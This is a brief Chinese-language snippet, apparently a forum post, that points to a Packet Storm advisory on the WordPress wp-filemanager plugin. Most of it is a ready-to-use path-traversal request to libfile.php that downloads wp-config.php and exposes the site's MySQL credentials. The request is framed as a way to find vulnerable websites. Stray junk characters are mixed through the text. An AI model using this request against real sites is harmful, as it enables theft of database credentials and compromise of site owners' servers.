洞详解:http://packetstormsecurity.com/f ... -File-Download.html8 M, k) n6 U( y C4 j/ D
' A3 O- j6 k, c- \* [
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。1 } |+ i2 U" I/ A+ A P% u% P3 Q) d
|